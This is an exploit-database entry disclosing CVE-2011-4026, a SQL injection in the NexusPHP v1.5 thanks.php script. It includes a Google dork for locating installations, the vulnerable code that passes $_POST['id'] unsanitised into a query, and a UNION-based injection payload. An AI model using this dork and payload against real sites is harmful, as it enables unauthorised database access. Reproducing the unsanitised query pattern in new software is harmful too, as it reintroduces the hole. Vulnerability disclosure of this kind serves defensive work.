NexusPHP v1.5 SQL Injection

🗓️ 07 Oct 2011 00:00:00Reported by flyh4tType

zdt🔗 0day.today👁 25 Views

NexusPHP v1.5 SQL Injection, BitTorrent private tracker PHP script, thanks.php vulnerabilit

Reporter	Title	Published	Views	Family All 9
CVE	CVE-2011-4026	21 Oct 201118:00	–	cve
Cvelist	CVE-2011-4026	21 Oct 201118:00	–	cvelist
Exploit DB	NexusPHP 1.5 - SQL Injection	8 Oct 201100:00	–	exploitdb
EUVD	EUVD-2011-3979	7 Oct 202500:30	–	euvd
exploitpack	NexusPHP 1.5 - SQL Injection	8 Oct 201100:00	–	exploitpack
NVD	CVE-2011-4026	21 Oct 201118:55	–	nvd
Packet Storm	NexusPHP 1.5 SQL Injection	9 Oct 201100:00	–	packetstorm
Prion	Sql injection	21 Oct 201118:55	–	prion
seebug.org	NexusPHP 1.5 - SQL Injection	1 Jul 201400:00	–	seebug

# Exploit Title: Nexusphp.v1.5 SQL injection Vulnerability
# Google Dork: intitle:nexusphp
# Date: 2011-10-08
# Author: flyh4t
# Software Link: http://sourceforge.net/projects/nexusphp/
# Version: nexusphp.v1.5
# Tested on: linux+apache
# CVE : CVE-2011-4026
 
 
Nexusphp is BitTorrent private tracker scripts written in PHP
The codes is here http://sourceforge.net/projects/nexusphp/
There is a sql injectiong Vulnerability in thanks.php.
  
-----------------------vul code-------------------
//thanks.php
if ($_GET['id'])
 stderr("Party is over!", "This trick doesn't work anymore. You need to click the button!");
$userid = $CURUSER["id"];
$torrentid = $_POST["id"];
$tsql = sql_query("SELECT owner FROM torrents where id=$torrentid");
$arr = mysql_fetch_array($tsql);
-----------------------vul code end-------------------
  
 $_POST["id"] is not checked, lead a sql injection Vulnerability
 
-----------------------exploit-------------------
 
_POST[id] : -1 union select version()>4/*
 
-----------------------exploit end -------------------



#  0day.today [2017-12-31]  #

07 Oct 2011 00:00Current

7.1High risk

Vulners AI Score7.1

EPSS0.00343